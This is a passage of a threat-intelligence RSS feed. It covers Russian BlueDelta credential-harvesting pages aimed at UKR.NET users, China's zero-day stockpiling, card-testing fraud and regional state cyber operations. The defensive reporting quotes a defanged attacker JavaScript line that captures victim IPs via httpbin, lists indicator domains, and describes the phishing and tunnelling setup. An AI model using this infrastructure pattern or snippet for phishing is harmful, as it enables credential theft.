        <p>The use of ngrok represents a notable change in BlueDelta’s infrastructure, as the threat group previously used compromised Ubiquiti routers to host Python scripts that captured credentials and handled 2FA and CAPTCHA challenges. This change is likely a response to efforts by the Federal Bureau of Investigation (FBI), National Security Agency (NSA), US Cyber Command, and international partners to dismantle BlueDelta's infrastructure <a href="https://media.defense.gov/2024/Feb/27/2003400753/-1/-1/0/CSA-Russian-Actors-Use-Routers-Facilitate-Cyber_Operations.PDF">in early 2024</a>.</p>
        <p>BlueDelta added new functionality to the page hosted on <em>kfghjerrlknsm[.]line[.]pm</em> to capture victim IP addresses using the free HTTP request and response API service HTTPBin, as shown in <strong>Figure 3</strong>.</p>
        <pre><code>var respIP=$.getJSON('hxxps://httpbin[.]org/ip');
</code></pre>
        <p><em><strong>Figure 3:</strong></em> <em>Credential harvest page JavaScript, used to capture the victim's IP address (Source: Recorded Future)</em></p>
        <p>Two additional credential harvesting pages were discovered in July and September 2024 that matched the configuration of the first page but used different Mocky URLs, with one of the pages configured to use a different port number. This is likely due to BlueDelta setting up a new ngrok tunnel.</p>
        <p>On September 13, 2024, Insikt Group identified a new UKR.NET credential harvesting page, which was again hosted on Mocky. For this page, BlueDelta exfiltrated credentials and relayed CAPTCHA information to the domain <em>5ae39a1b39d45d08f947bdf0ee0452ae[.]serveo[.]net</em>.</p>
        <p>The apex domain <em>serveo[.]net</em> is owned by Serveo, a company that offers free remote port forwarding services similar to ngrok.</p>
        <p>In October and November 2024, Insikt Group identified three new UKR.NET-themed credential harvesting pages. Again, these pages were hosted using Mocky and were constructed with similar JavaScript to the previously reported pages. However, in the latest pages, BlueDelta moved upstream credential capture and relay functionality back to ngrok, using the custom DNS EXIT domain <em>jkbfgkjdffghh[.]linkpc[.]net</em>, configured with two separate fixed high ephemeral ports: 10176 and 17461. At the time of analysis, the <em>linkpc[.]net</em> domain resolved to suspected ngrok IP address <em>3[.]67[.]15[.]169</em>.</p>
        <p>Additionally, BlueDelta added new first-stage redirection domains for two of the pages: <em>ukraine[.]html-5[.]me</em> and <em>ukrainesafe[.]is-great[.]org</em>. It is likely that the threat actors added this extra step to hide Mocky URLs in phishing emails. The apex domains <em>html-5[.]me</em> and <em>is-great[.]org</em> are owned by the free hosting company Byet Internet Services.</p>
        <p>On December 27, 2024, Insikt Group identified a new BlueDelta UKR.NET credential harvesting page hosted on the Mocky URL <em>run[.]mocky[.]io/v3/72fa0a52-6e6e-43ad-b1c2-4782945d6050</em>. The malicious UKR.NET page had very similar functionality to the previously detailed pages. The page used JavaScript to exfiltrate credentials and relay CAPTCHA information to the same DNS EXIT domain, with an updated fixed port, <em>jkbfgkjdffghh[.]linkpc[.]net:17461,</em> as shown in <strong>Figures 4 and 5</strong>.</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_1d3acfd7246af4bd0b054c43368a2c03afecd6e12.jpg?width=750&amp;format=jpg&amp;optimize=medium" width="1330" height="1600" />
        </p>
        <p><em><strong>Figure 4:</strong></em> <em>JavaScript functions and variables containing the linkpc[.]net domain (Source: Recorded Future)</em></p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_10c10db1d8d09ea494c21cd484e6f0e6adeccfc34.jpg?width=750&amp;format=jpg&amp;optimize=medium" width="1147" height="1600" />
        </p>
        <p><em><strong>Figure 5:</strong></em> <em>JavaScript code used to capture credentials (Source: Recorded Future)</em></p>
        <p>During the analysis of this credential harvesting page, Insikt Group detected over twenty linked PDF files, which BlueDelta likely sent to victims as phishing lures. The PDF lure document, as shown in <strong>Figure 6</strong>, informs the target of suspicious activity on their UKR.NET account and requests that they click a link to reset their password.</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_15c6aeca393c16eb8df14a4a9b2d04fd98ce25d63.png?width=750&amp;format=png&amp;optimize=medium" width="809" height="482" />
        </p>
        <p><em><strong>Figure 6:</strong></em> <em>PDF lure used by BlueDelta to entice victims to click links leading to credential harvesting pages</em></p>
        <p><em>(Source: Recorded Future)</em></p>
        <p>Each of the PDFs included a hyperlink to a credential harvesting page. Most of these links were either shortened using link-shortening services or used a domain registered through a free hosting provider. Since 2023, BlueDelta has used the following link-shortening platforms:</p>
        <ul>
          <li>doads[.]org</li>
          <li>in[.]run</li>
          <li>t[.]ly</li>
          <li>tiny[.]cc</li>
          <li>tinyurl[.]com</li>
          <li>linkcuts[.]com</li>
        </ul>
        <p>In addition to link-shortening services, BlueDelta has employed free domains from the hosting provider InfinityFree or from Byet Internet Services, or subdomains provided by the free blogging platform Blogger (formerly Blogspot) for tier-two link redirection, in conjunction with link-shortening services. The following apex domains have been used in BlueDelta campaigns since 2023:</p>
      ]]></content:encoded>
            <category>Research (Insikt)</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/research/media_11203fd322f018c8d0b5f9b3c85f34cb897128ad0.gif?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[China’s Zero-Day Pipeline: From Discovery to Deployment]]></title>
            <link>https://www.recordedfuture.com/research/china-zero-day-pipeline</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/research/china-zero-day-pipeline</guid>
            <pubDate>Wed, 17 Dec 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[China is consolidating cyber power through zero-days. Explore how state control of vulnerabilities enables long-term strategic advantage.]]></description>
            <content:encoded><![CDATA[
        <h2>Executive Summary</h2>
        <ul>
          <li>China’s observed use of zero-days has declined since 2023. However, it has expanded its capacity to discover and manage vulnerabilities, <strong>signaling a continued effort toward stockpiling exploits</strong> for strategic or military advantage.</li>
          <li>The Data Security Law (DSL) and Provisions on the Management of Network Product Security Vulnerabilities (RMSV) <strong>give the Chinese state first access and control over zero-days.</strong> Combined with government-backed competitions, incentives, and private contractors, this framework likely sustains one of the world’s largest reserves of exploitable vulnerabilities.</li>
          <li>The creation of the Information Support Force (ISF) and Cyberspace Force (CSF) signals China’s <strong>consolidation of cyber capabilities</strong>, likely enabling more effective offensive and defensive cyber operations, with vulnerabilities likely serving as a central resource.</li>
          <li>Defenders should adopt an “assume breach” posture and build for containment, implementing <strong>zero trust and layered defenses</strong> to limit attacker movement and impact after an exploit.</li>
        </ul>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_15e000151ffba5a4ff78475507202df421f0d8641.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="957" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 1:</strong></em> <em>How China stockpiles vulnerabilities</em> <em>(Source: Recorded Future)</em></div>
          </div>
        </div>
        <h2>Analysis</h2>
        <h3>Zero-Days as Strategic Weapons</h3>
        <p>A zero-day is a previously unknown software flaw for which no patch exists at the time it is discovered or exploited. Once weaponized, it allows adversaries to gain access, escalate privileges, or execute remote commands. These capabilities are especially effective against perimeter and enterprise systems, where a successful compromise can provide initial access and allow attackers to maintain persistence and carry out further cyber actions.</p>
        <p>Choosing whether to disclose or keep a zero-day vulnerability is a strategic decision. Governments must balance public safety with the potential intelligence or military value of keeping the flaw secret. In the US, this process is guided by the <a href="https://trumpwhitehouse.archives.gov/sites/whitehouse.gov/files/images/External%20-%20Unclassified%20VEP%20Charter%20FINAL.PDF">Vulnerabilities Equities Process (VEP)</a>, which is designed to be transparent and generally favors disclosure to help maintain internet security.</p>
        <h3>China’s Vulnerability Management Regime</h3>
        <p>China’s vulnerability management system is <a href="https://www.atlanticcouncil.org/in-depth-research-reports/report/sleight-of-hand-how-china-weaponizes-software-vulnerability/">centralized</a> and led by the state. Its laws, incentives, and institutions work together to feed new exploits and technical capabilities directly to the government, turning software vulnerabilities into strategic assets under state control.</p>
        <ul>
          <li><strong>Mandatory Reporting</strong></li>
        </ul>
        <p>The RMSV (2021) <a href="https://www.chinalawtranslate.com/en/product-security-vulnerabilites/">requires</a> that all discovered vulnerabilities be reported to the Ministry of Industry and Information Technology (MIIT) within two days and prohibits disclosure to foreign entities. The <a href="http://www.npc.gov.cn/englishnpc/c2759/c23934/202112/t20211209_385109.html">Data Security Law</a> (DSL) and <a href="https://www.chinalawtranslate.com/en/national-intelligence-law-of-the-p-r-c-2017/#gsc.tab=0">National Intelligence Law</a> (NIL) further compel all individuals and organizations to support state security objectives, with strict penalties for non-compliance. Together, these laws grant Beijing first access and complete control over all newly discovered flaws.</p>
        <ul>
          <li><strong>Incentivizing Compliance</strong></li>
        </ul>
        <p>This legal framework is reinforced through financial and professional incentives. The <a href="https://www.cnnvd.org.cn/">China National Vulnerability Database of Information Security</a> (CNNVD), managed by the Ministry of State Security (MSS), <a href="https://nattothoughts.substack.com/p/chinas-vulnerability-research-whats">offers</a> researchers and firms monetary rewards, certificates, honorary titles, and preferential access to government contracts. This system encourages compliance by making vulnerability disclosure both mandatory and materially rewarding.</p>
        <ul>
          <li><strong>Talent Development and Recruitment Pipelines</strong></li>
        </ul>
        <p>China combines strict regulations with a well-organized system for developing cybersecurity talent. Competitions such as the Tianfu Cup, Matrix Cup, and QiangWang Cup serve as key recruitment and training platforms for the state’s cyber programs. The 2024 Matrix Cup’s <a href="https://nattothoughts.substack.com/p/chinas-vulnerability-research-whats">$2.75 million USD</a> prize pool, nearly twice that of Canada’s Pwn2Own, highlights the size of this investment.</p>
        <ul>
          <li><strong>Private Sector Relationships</strong><br /><br />China’s private sector also plays a <a href="https://www.atlanticcouncil.org/in-depth-research-reports/report/crash-exploit-and-burn/#conclusion">pivotal role</a>. Major firms such as Qi An Xin, Huawei, Qihoo 360, and NSFocus contribute vulnerabilities and technical expertise directly to the government. Large technology companies also fund or subcontract offensive work to smaller firms, creating a dense ecosystem of start-ups engaged in exploit research and hacking services. The <a href="https://www.recordedfuture.com/research/attributing-i-soon-private-contractor-linked-chinese-state-sponsored-groups">i-SOON leaks</a> (2023) revealed the scale and interconnectedness of this ecosystem: The company sold hack-for-hire services and targeting platforms to government customers while subcontracting work for Qi An Xin and Chengdu 404.</li>
        </ul>
        <h3>From Discovery to Deployment: Operationalizing China’s Vulnerability Pipeline</h3>
        <p>This centralized vulnerability ecosystem is producing <a href="https://nattothoughts.substack.com/p/chinas-vulnerability-research-whats">measurable results</a>, enabling Chinese state-sponsored groups to convert vulnerability discovery into operational access at a speed and scale far beyond that seen in other national programs. A clear manifestation of this is their sustained focus on enterprise and edge technologies, including Fortinet, VMware/ESXi, and Ivanti, where access is durable and often high-privileged, and detection is limited. In 2025, China-linked groups exploited <a href="https://cloud.google.com/blog/topics/threat-intelligence/ivanti-connect-secure-vpn-zero-day">Ivanti VPN</a> and Trimble Cityworks (<a href="https://www.recordedfuture.com/blog/trimble-cityworks-cve-2025-0994-vulnerability-analysis">1</a>, <a href="https://therecord.media/hackers-exploiting-trimble-cityworks-bug-used-by-local-govs">2</a>) flaws as part of a long-term strategy to remain undetected within networks, expand access, and position themselves for potential critical infrastructure disruption.</p>
        <p>China continues to expand its network of CNNVD technical support units (TSUs) and related programs, increasing its overall research base. TSUs are specialized organizations, often universities, state-linked labs, and cybersecurity firms that directly feed vulnerability research and intelligence into the national system. Since 2021, the number of TSUs has increased significantly, broadening the state’s research capacity and deepening its ability to identify and operationalize software flaws at scale.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_13e7963e118803f4d4991324bfaa7fc0ddd6019fc.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="900" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 2:</strong></em> <em>Number of new CNNVD TSUs by month, June 2021 to July 2025</em> <em>(Source:</em> <em><a href="https://nattothoughts.substack.com/p/chinas-vulnerability-research-whats">Natto Thoughts</a>)</em></div>
          </div>
        </div>
        <p>Most vulnerability disclosures to affected vendors and the broader security community still originate from universities, labs, and cybersecurity firms associated with CNNVD, CNVD, and the expanding TSU network. However, even as the ecosystem grows, the overall volume of these disclosures continues to <a href="https://www.atlanticcouncil.org/in-depth-research-reports/report/sleight-of-hand-how-china-weaponizes-software-vulnerability/?utm_source=chatgpt.com">decline</a>, indicating that a larger share of discoveries is now being routed <a href="https://www.recordedfuture.com/blog/chinese-mss-vulnerability-influence">internally</a> rather than published. This suggests that more vulnerabilities are being withheld for state-directed use. Secrecy surrounding hacking competitions is also growing: The Tianfu Cup was not held publicly in 2024, and the 2024 Matrix Cup shared little to <a href="https://nattothoughts.substack.com/p/the-matrix-cup-cultivating-top-hacking">no details</a> about discovered exploits. These competitions have historically been major sources of high-quality vulnerabilities, and reduced transparency further aligns with the shift away from open disclosure.<br /><br />Together, these trends — the rapid expansion of TSUs, the decline in public vulnerability reporting, and the tightening secrecy around exploit-generation events — likely point to a deliberate state strategy that emphasizes centralized stockpiling and selective operational use of vulnerabilities rather than public disclosure.</p>
        <p><strong>Strategic Stockpiling and Selective Use</strong></p>
        <p>China’s <a href="https://cloud.google.com/blog/topics/threat-intelligence/2023-zero-day-trends">reported</a> use of zero-days declined from twelve in 2023 to five in 2024, and it is responsible for only ten of the 104 zero-day exploits identified globally so far in 2025. While this may partly reflect limited visibility into zero-day deployment and attribution, the trend may also suggest a more selective, strategic approach to when and how its zero-day capabilities are used.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_13d3e1d5ebec066cdcdff5beca720487d65e8ef26.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="816" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 3:</strong></em> <em>Of the 104 zero-days identified in 2025, ten were attributed to Chinese state-sponsored threat actors (Source: Recorded Future)</em></div>
          </div>
        </div>
        <p>Beijing’s control mechanisms under the RMSV and DSL enable it to selectively weaponize or withhold zero-days, preserving its most impactful capabilities for crises or strategic objectives. At the same time, n-day vulnerabilities — older but still unpatched flaws — remain highly effective due to inconsistent global patching.</p>
        <p>Using these known flaws allows Chinese operators to gain access to networks and gather intelligence without revealing their zero-day exploits. Overall, this reflects a system designed for long-term preparedness rather than immediate gain.</p>
        <p><strong>Military Integration and Strategic Significance</strong></p>
        <p>China’s April 2024 military reforms <a href="https://ndupress.ndu.edu/Media/News/News-Article-View/Article/4157257/a-new-step-in-chinas-military-reform/">introduced</a> three new divisions within the People’s Liberation Army (PLA), including two centered on cyber and information security:</p>
        <ul>
          <li>The Information Support Force (ISF), which is <a href="https://jamestown.org/program/a-disturbance-in-the-force-the-reorganization-of-peoples-liberation-army-command-and-elimination-of-chinas-strategic-support-force/">responsible</a> for the security and continuity of China’s military networks, data systems, and command infrastructure</li>
          <li>The Cyberspace Force (CSF), which is <a href="https://www.iiss.org/online-analysis/online-analysis/2024/05/chinas-new-information-support-force/">dedicated</a> to both offensive and defensive cyber operations</li>
        </ul>
        <p>Together, the two units consolidate China’s cyber and information capabilities, which were previously primarily nested under the PLA Strategic Support Force. These units form the backbone of its digital warfighting structure. The restructuring is likely to enhance Beijing’s ability to coordinate kinetic and cyber operations, with zero-days serving as key enablers and potential first-strike tools.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_1e37fc1772617d06c2746e0f6deba2a514f7ffd2b.png?width=750&amp;format=png&amp;optimize=medium" width="1249" height="512" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 4:</strong></em> <em>New structure of the People’s Liberation Army (PLA) (Source:</em> <em><a href="https://jamestown.org/wp-content/uploads/2024/04/CB-V-24-Issue-9-April-26.pdf">The Jamestown Foundation</a>)</em></div>
          </div>
        </div>
        <p>The future use of zero-days will depend on how China decides to pursue its geostrategic goals, such as <a href="https://www.recordedfuture.com/research/from-coercion-to-invasion-the-theory-and-execution-of-china-cyber-activity">future unification</a> with Taiwan. However, by compromising critical networks in advance, China can secure persistent access and deploy disruptive cyber effects alongside kinetic operations, as seen in Russia’s <a href="https://blogs.microsoft.com/on-the-issues/2022/06/22/defending-ukraine-early-lessons-from-the-cyber-war/">coordinated</a> cyber-military campaigns in Ukraine. Chinese state-sponsored <a href="https://app.recordedfuture.com/portal/intelligence-card/rWxgd_/overview">Volt Typhoon</a> activity has been widely assessed as fulfilling such a purpose.</p>
        <h2>Outlook</h2>
        <ul>
          <li><strong>Increased Willingness to Use Zero-Days:</strong> As China reduces its reliance on US technology through its “<a href="https://www.wsj.com/world/china/china-technology-software-delete-america-2b8ea89f?gaa_at=eafs&amp;gaa_n=AWEtsqePdzH3SRky1gFGa5OK6eLRoL78W2-ChzKYqbYaN8iUdsXKWF60d69fkSz8XTs%3D&amp;gaa_ts=68f7a71d&amp;gaa_sig=afo7Dvij1rhGpclsWz_RcXPU0MRK8PaKKNGOTG0Hj8LOLI9vBlFGl8iwGOQq2yx1FCUqK89rZf_PDBlddaDQvg%3D%3D">Delete America</a>” campaign, the cost of exploiting Western software will decrease, making zero-day use more attractive in future conflicts over the long term.</li>
          <li><strong>Expanded Pre-Positioning:</strong> Expect continued infiltration of critical infrastructure and enterprise systems through both n-day and zero-day exploits to ensure durable wartime access.</li>
          <li><strong>Increased N-day Use:</strong> The rapid adoption of AI-assisted coding and automation is accelerating the accumulation of software vulnerabilities. This expanding security debt — the accumulation of unpatched and unreviewed vulnerabilities — will give adversaries, including China, a broader and more persistent pool of n-day exploits to weaponize.</li>
          <li><strong>Evolving Contractor Ecosystem:</strong> State-aligned private firms are likely to accelerate automation and AI-assisted vulnerability discovery, thereby expanding the Chinese state’s operational stockpile of viable exploits.</li>
          <li></li>
        </ul>
        <h2>Mitigations</h2>
        <ul>
          <li><strong>Adopt an “Assume Breach” Posture:</strong> Implement zero-trust architectures that enforce identity and device verification at every access point. Use <a href="http://recordedfuture.com/products/threat-intelligence">Recorded Future® Threat Intelligence</a> to monitor for China-nexus infrastructure and malicious activity, feeding enriched indicators directly into security information and event management (SIEM) and security orchestration, automation, and response (SOAR) workflows.</li>
          <li><strong>Prioritize Edge and Enterprise Patching:</strong> Focus remediation efforts on virtual private networks (VPNs), firewalls, hypervisors, and identity platforms most commonly targeted by China-nexus threat actors. Use <a href="https://www.recordedfuture.com/products/vulnerability-intelligence">Recorded Future Vulnerability Intelligence</a> to track emerging zero-day and n-day threats, prioritize patching by exploitation risk, and validate remediation across critical systems.</li>
          <li><strong>Detect Post-Exploitation Behavior:</strong> Use D3FEND mappings such as Process Access Pattern Analysis (D3-PAPA) and Remote Access Detection (D3-RAD) to identify stealthy follow-on actions. Combine these controls with <a href="https://www.recordedfuture.com/products/attack-surface-intelligence">Recorded Future Attack Surface Intelligence</a> to identify exposed assets and verify that detection coverage extends to externally facing environments.</li>
          <li><strong>Secure Identities and Access:</strong> Leverage <a href="https://www.recordedfuture.com/products/identity-intelligence">Recorded Future Identity Intelligence</a> to detect compromised credentials that may complement exploit-based intrusions.</li>
        </ul>
        <h2>Risk Scenario</h2>
        <p><em>EnerTech Global</em>, a European energy technology firm providing control systems and smart grid software to multiple NATO-aligned countries, becomes the target of a Chinese state-sponsored cyber campaign. Using undisclosed zero-day vulnerabilities, Chinese operators infiltrate EnerTech’s production and customer environments to gather intelligence, manipulate software updates, and pre-position for potential disruption.</p>
        <h3>First-Order Implications</h3>
        <p>Chinese threat actors exploit a zero-day in a network management or VPN appliance to gain initial access to EnerTech’s internal systems and engineering networks.</p>
        <p>A zero-day in industrial control or software build pipelines is used to insert malicious code into firmware updates distributed to downstream customers.</p>
        <h4>Organizational Risks:</h4>
        <ul>
          <li><strong>Operational:</strong> Compromise of development and production networks halts manufacturing and disrupts customer support operations.</li>
          <li><strong>Legal:</strong> Breach of export-control and cybersecurity regulations triggers EU and US compliance investigations.</li>
          <li><strong>Brand:</strong> Public confirmation of a “state-backed breach” undermines trust with government and defense customers dependent on EnerTech’s technology.</li>
        </ul>
        <h3>Second-Order Implications</h3>
        <p>Attackers use stolen code-signing certificates to distribute trojanized software updates to energy utilities across Europe. Collected intelligence on grid infrastructure is used to map potential disruption points for future contingency operations.</p>
        <h4>Organizational Risks:</h4>
        <ul>
          <li><strong>Operational:</strong> Some utilities begin to see irregularities in their operational technology (OT) environments, including unexpected behavior in grid-monitoring tools, delayed telemetry updates, and unexplained authentication failures on systems that rely on EnerTech software.</li>
          <li><strong>Brand:</strong> EnerTech’s reputation deteriorates as customers and regulators question its software assurance and supply chain controls.</li>
          <li><strong>Legal:</strong> Disclosure of tampered software triggers international incident response coordination and potential export-license suspension.</li>
        </ul>
        <h3>Third-Order Implications</h3>
        <p>Persistent access enables China to remotely sabotage or disable systems during a geopolitical crisis, thereby amplifying disruption across allied power grids. Stolen intellectual property is used by Chinese competitors to replicate EnerTech’s industrial software, undercutting global market bids.</p>
        <h4>Organizational Risks:</h4>
        <ul>
          <li><strong>Competitive:</strong> Loss of proprietary code and technology enables China-based competitors to dominate regional procurement markets.</li>
          <li><strong>Brand:</strong> Association with a high-profile critical infrastructure breach erodes long-term credibility in both commercial and government sectors.</li>
          <li><strong>Legal:</strong> Multinational investigations and sanctions create enduring compliance exposure and financial penalties.</li>
        </ul>
        <h2>Further Reading</h2>
        <ul>
          <li><a href="https://www.recordedfuture.com/research/redecho-targeting-indian-power-sector">China-linked Group RedEcho Targets the Indian Power Sector Amid Heightened Border Tensions</a></li>
          <li><a href="https://www.recordedfuture.com/research/continued-targeting-of-indian-power-grid-assets">Continued Targeting of Indian Power Grid Assets by Chinese State-Sponsored Activity Group</a></li>
          <li><a href="https://www.recordedfuture.com/research/from-coercion-to-invasion-the-theory-and-execution-of-china-cyber-activity">From Coercion to Invasion: The Theory and Execution of China’s Cyber Activity in Cross-Strait Relations</a></li>
          <li><a href="https://www.recordedfuture.com/blog/chinese-mss-vulnerability-influence">China’s Ministry of State Security Likely Influences National Network Vulnerability Publications</a></li>
          <li><a href="https://www.iiss.org/online-analysis/online-analysis/2024/05/chinas-new-information-support-force/">China’s new Information Support Force</a></li>
        </ul>
      ]]></content:encoded>
            <category>Research (Insikt)</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/research/media_103d01df10dae3a07a40c46523f00a6b54d5aa865.gif?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[The $0 Transaction That Signaled a Nation-State Cyberattack]]></title>
            <link>https://www.recordedfuture.com/blog/transaction-that-signaled-nation-state-cyberattack</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/transaction-that-signaled-nation-state-cyberattack</guid>
            <pubDate>Wed, 17 Dec 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[A $0 card test signaled a Chinese state-linked cyberattack on Anthropic’s AI platform. Learn how card-testing fraud intelligence spots nation-state ops early.]]></description>
            <content:encoded><![CDATA[
        <div>
          <div>
            <div>
              <h2>Key Points:</h2>
              <ul>
                <li>Fraud enables cyber operations: Threat actors used compromised payment cards validated through Chinese-operated card-testing services to attempt unauthorized access to Anthropic's AI platform during a reported state-sponsored espionage campaign.</li>
                <li><a href="https://www.recordedfuture.com/products/payment-fraud-intelligence">Card testing</a> signals downstream attacks: The observed fraud followed a predictable kill chain—compromise, validation, resale, and attempted cashout—providing early warning <a href="https://www.recordedfuture.com/threat-intelligence-101/intelligence-sources-collection/threat-intelligence-feeds">indicators</a> that preceded the final malicious transaction.</li>
                <li>Recorded Future’s take: Proactive fraud intelligence prevents broader threats. Tester merchant intelligence can identify compromised cards before they're used for high-value fraud or to support advanced threat actor operations.</li>
              </ul>
            </div>
          </div>
        </div>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_1b69b3987107eb35b9673377e1cac520995d23f77.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Cyber on the Geopolitical, Battlefield: Beyond the, “Big Fourˮ]]></title>
            <link>https://www.recordedfuture.com/research/cyber-geopolitical-battlefield</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/research/cyber-geopolitical-battlefield</guid>
            <pubDate>Wed, 17 Dec 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[Offensive cyber operations are spreading beyond the Big Four. Discover how regional conflicts are driving new state-linked cyber threats.]]></description>
            <content:encoded><![CDATA[
        <h2>Executive Summary</h2>
        <p>Regional conflicts and weakened international institutions are driving the use of offensive cyber operations beyond the “Big Four” (China, Russia, Iran, and North Korea). Monitoring these threat actors requires organizations to <strong>proactively assess their geopolitical risk</strong> to understand where future threats are most likely to emerge.</p>
        <p>In 2025, Recorded Future identified at least <strong>twenty actors across thirteen “non-Big Four” countries</strong> conducting cyber operations, primarily linked to regional conflicts, domestic surveillance, or foreign espionage.</p>
        <p>Companies should closely monitor regional geopolitics and <strong>maintain strong continuity and resilience plans</strong> to protect against cyber espionage or disruptive cyberattacks.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_18967900e841d62eae716d18a4b04dcc4ae65efcb.png?width=750&amp;format=png&amp;optimize=medium" width="1194" height="668" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 1:</strong></em> <em>Trends influencing how and why state-sponsored actors beyond China, Russia, Iran, and North Korea carry out cyber operations (Source: Recorded Future)</em></div>
          </div>
        </div>
        <h2>Analysis</h2>
        <h3><em>Overview of Other State Sponsors of Cyber Operations</em></h3>
        <p>While the “Big Four” account for the majority of reported cyber threat activity, many other countries use cyber operations to advance their strategic interests. Recorded Future data shows that most observed activity outside of the “Big Four” stems from regional conflicts. Patriotic hacktivist groups, which advance state interests alongside state-sponsored espionage operations, represent the highest volume of reported activity. The degree of coordination between hacktivists and the government remains unclear and likely <a href="https://www.atlanticcouncil.org/wp-content/uploads/2012/02/022212_ACUS_NatlResponsibilityCyber.PDF">varies</a>. However, their actions are included in this assessment because of their close alignment with state objectives, which means their activity correlates with interstate conflict risk.</p>
        <p>Outside of active conflict, espionage against foreign and domestic targets continues to be a major driver of cyber operations. The most <a href="https://www.iiss.org/globalassets/media-library---content--migration/files/research-papers/cyber-power-report/cyber-capabilities-and-national-power---a-net-assessment___.pdf">cyber-capable</a> states invest heavily in avoiding detection and attribution, given the significant <a href="https://europe.unc.edu/wp-content/uploads/sites/314/2016/11/Brief_NSA_Leaks_Transatlantic_Relations_2014.pdf">negative</a> political consequences of exposure.</p>
        <p>Tracking threat actors beyond the Big Four requires organizations to understand their geopolitical risk in order to anticipate where threats are most likely to emerge. Operating in certain regions or conflict zones likely increases the risk of cyber espionage or destructive attacks.</p>
        <h3><em>Regional Cyber Conflicts</em></h3>
        <p>Territorial disputes drove nearly two-thirds of observed cyber activity in 2025, according to Recorded Future data. Cyber operations focused on intelligence collection against government, defense, and other critical infrastructure. Hacktivists escalated their activity during conflicts, carrying out nuisance-level attacks amplified through influence operations. Like hacktivists, influence operations align closely with state interests during conflict, but have varying degrees of connection to the state. These activities rarely affect battlefield outcomes but are designed to signal technical sophistication or moral superiority over the adversary.</p>
        <h4>India and Pakistan</h4>
        <p>Between May 7 and 10, 2025, India and Pakistan <a href="https://www.stimson.org/2025/four-days-in-may-the-india-pakistan-crisis-of-2025/">exchanged</a> a series of missile strikes — the most serious escalation between the two nuclear-armed countries in decades. Throughout the crisis, large volunteer hacktivist communities on both sides conducted disruptive attacks, <a href="https://www.rusi.org/explore-our-research/publications/commentary/operation-sindoor-and-india-pakistans-escalated-rivalry-cyberspace">primarily</a> DDoS and website defacements. Pakistan-linked APT36 <a href="https://www.cyfirma.com/research/apt36-targets-indian-boss-linux-systems-with-weaponized-autostart-files/">conducted</a> espionage operations <a href="https://www.trendmicro.com/en_us/research/22/a/investigating-apt36-or-earth-karkaddans-attack-chain-and-malware.html">targeting</a> the Indian government and other politically motivated targets, while threat actors linked to the Indian government, such as SideWinder, pursued Pakistani <a href="https://www.acronis.com/en/tru/posts/from-banks-to-battalions-sidewinders-attacks-on-south-asias-public-sector/">military</a> targets.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_1a9881b0bdbc5c31c2a924c1974d48e4684a87fe0.png?width=750&amp;format=png&amp;optimize=medium" width="1140" height="628" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 2:</strong></em> <em>Cyber activity between India and Pakistan spiked alongside the outbreak of armed conflict in May 2025 (Source:</em> <em><a href="https://www.recordedfuture.com/research/influence-operations-and-conflict-escalation-in-south-asia">Recorded Future</a>)</em></div>
          </div>
        </div>
        <p>Influence operations intended to shape perceptions of the conflict also <a href="https://www.recordedfuture.com/research/influence-operations-and-conflict-escalation-in-south-asia">intensified</a>. Influence networks amplified hacktivist claims, often overstating their impact, such as <a href="https://www.hindustantimes.com/trending/pib-debunks-claim-that-pakistani-hackers-crippled-70-of-india-s-power-grid-101747134385434.html">widespread reporting</a> on Pakistani social media that hackers had shut down 70% of India’s electric grid. These operations are intended to portray their own side as more capable and their adversary as vulnerable, underscoring the importance of narrative control in conjunction with military operations.</p>
        <h4>Thailand and Cambodia</h4>
        <p>Similar to cyber engagements observed between India and Pakistan, hacktivist operations bolstered by influence campaigns <a href="https://moderndiplomacy.eu/2025/07/21/cyber-clashes-between-cambodia-and-thailand-threaten-asean-stability/">significantly escalated</a> between Thai hackers and Cambodian hackers following the <a href="https://www.politico.com/news/2025/07/23/thai-and-cambodian-soldiers-fire-at-each-other-in-disputed-border-area-00473426">May 2025</a> conflict. These were largely carried out by self-proclaimed patriotic hacktivist groups. Operations included DDoS attacks, website defacements, and data leak operations. More targeted <a href="https://www.cnn.com/2025/07/01/asia/thailand-pm-paetongtarn-suspended-intl-hnk">hack-</a><a href="https://www.bangkokpost.com/thailand/general/3083900/cyber-cops-send-leaked-hun-sen-audio-file-to-oag">and-leak</a> operations were also intended to reveal politically damaging information about the other country’s leadership. Influence operation narratives emphasized that the opposing side was the aggressor in the conflict, likely in order to garner both domestic and international support.</p>
        <h4>Morocco and Algeria</h4>
